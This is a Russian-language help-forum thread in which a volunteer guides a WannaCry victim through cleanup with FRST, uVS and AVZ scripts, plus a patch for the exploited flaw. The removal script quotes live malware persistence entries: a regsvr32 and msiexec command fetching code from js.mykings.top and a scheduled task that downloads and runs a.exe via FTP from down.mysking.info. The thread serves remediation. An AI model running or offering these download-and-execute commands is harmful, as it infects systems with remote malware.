Расок Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Добрый день зашифрованы файлы @WanaDecryptor@.exe прошу помочь с расшифровкой !!! CollectionLog-2017.05.12-20.17.zip FRST.rar Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 (изменено) Запустите FRST/FRST64 Нажмите комбинацию Ctrl+y - откроется Блокнот Скопируйте в него следующий код: Start:: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig] <===== ATTENTION GroupPolicy: Restriction <======= ATTENTION 2017-05-12 16:57 - 2017-05-12 16:24 - 0000933 _____ () C:\Users\Каратель\AppData\Local\@Please_Read_Me@.txt 2017-05-12 16:57 - 2017-05-12 16:24 - 0000722 _____ () C:\Users\Каратель\AppData\Local\@WanaDecryptor@.exe.lnk 2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\Users\Все пользователи\haetqxjechxm392 2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\ProgramData\haetqxjechxm392 2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Каратель\Desktop\@WanaDecryptor@.bmp 2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Public\Desktop\@WanaDecryptor@.bmp 2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Default\Desktop\@WanaDecryptor@.bmp 2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Default User\Desktop\@WanaDecryptor@.bmp 2017-05-12 16:57 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\Downloads\@Please_Read_Me@.txt 2017-05-12 16:57 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\AppData\Local\@Please_Read_Me@.txt 2017-05-12 16:57 - 2017-05-12 16:24 - 00000722 _____ C:\Users\Каратель\AppData\Local\@WanaDecryptor@.exe.lnk 2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\Users\Все пользователи\haetqxjechxm392 2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\ProgramData\haetqxjechxm392 2017-05-12 16:24 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\Desktop\@Please_Read_Me@.txt EmptyTemp: Reboot: End:: Сохраните (Ctrl+s) и закройте. Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Изменено 12 мая, 2017 пользователем regist добавка Ссылка на комментарий Поделиться на другие сайты More sharing options...
Расок Опубликовано 12 мая, 2017 Автор Share Опубликовано 12 мая, 2017 (Fixlog.txt) Fixlog.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Свежие логи FRST для контроля сделайте. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Расок Опубликовано 12 мая, 2017 Автор Share Опубликовано 12 мая, 2017 Свежие логи FRST для контроля сделайте. Лог FRST FRST.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Вообще их требуется 3, но хоть два как в первом посте прикрепите. И HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{4f3c790b-93aa-4e74-b2f3-93845c13698e} <======= ATTENTION (Restriction - IP) сами политику настраивали? Ссылка на комментарий Поделиться на другие сайты More sharing options...
Расок Опубликовано 12 мая, 2017 Автор Share Опубликовано 12 мая, 2017 Вообще их требуется 3, но хоть два как в первом посте прикрепите. сами политику настраивали? FRST.rar Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Не ответили IPSec политику сами настраивали? Ссылка на комментарий Поделиться на другие сайты More sharing options...
Расок Опубликовано 12 мая, 2017 Автор Share Опубликовано 12 мая, 2017 Вообще их требуется 3, но хоть два как в первом посте прикрепите. И HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{4f3c790b-93aa-4e74-b2f3-93845c13698e} <======= ATTENTION (Restriction - IP) сами политику настраивали? Скорее всего да !!! Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Запустите FRST/FRST64 Нажмите комбинацию Ctrl+y - откроется Блокнот Скопируйте в него следующий код: Start:: CreateRestorePoint: HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q 2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\Users\Все пользователи\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001 2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\ProgramData\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001 2017-05-12 21:05 - 2017-05-12 21:05 - 00003446 _____ C:\Windows\System32\Tasks\Mysa Task: {6DDF9EB5-32FA-4C42-9B68-06FA71F08326} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe Reboot: End:: Сохраните (Ctrl+s) и закройте. Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да". Подробнее читайте в руководстве Как подготовить лог UVS. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Расок Опубликовано 12 мая, 2017 Автор Share Опубликовано 12 мая, 2017 Запустите FRST/FRST64 Нажмите комбинацию Ctrl+y - откроется Блокнот Скопируйте в него следующий код: Start:: CreateRestorePoint: HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q 2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\Users\Все пользователи\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001 2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\ProgramData\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001 2017-05-12 21:05 - 2017-05-12 21:05 - 00003446 _____ C:\Windows\System32\Tasks\Mysa Task: {6DDF9EB5-32FA-4C42-9B68-06FA71F08326} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe Reboot: End:: Сохраните (Ctrl+s) и закройте. Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. Скачайте Universal Virus Sniffer (uVS) Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе. !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную. Дождитесь окончания работы программы и прикрепите лог к посту в теме. !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да". Подробнее читайте в руководстве Как подготовить лог UVS. ПК_2017-05-12_22-21-16.7z Fixlog.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
regist Опубликовано 12 мая, 2017 Share Опубликовано 12 мая, 2017 Есть поле быстрого ответа внизу, не надо заниматься оверквотингом. 1) Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена: ;uVS v4.0.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.1 v400c BREG ;---------command-block--------- delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.8\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.8\PSMACHINE_64.DLL delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL apply restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..." Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен. Обновление поставьте http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212И в будущем не забывайте своевременно обновляться. Выполните скрипт в AVZ при наличии доступа в интернет: var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end. После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.Выполните рекомендации после лечения. Больше помочь нечем. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти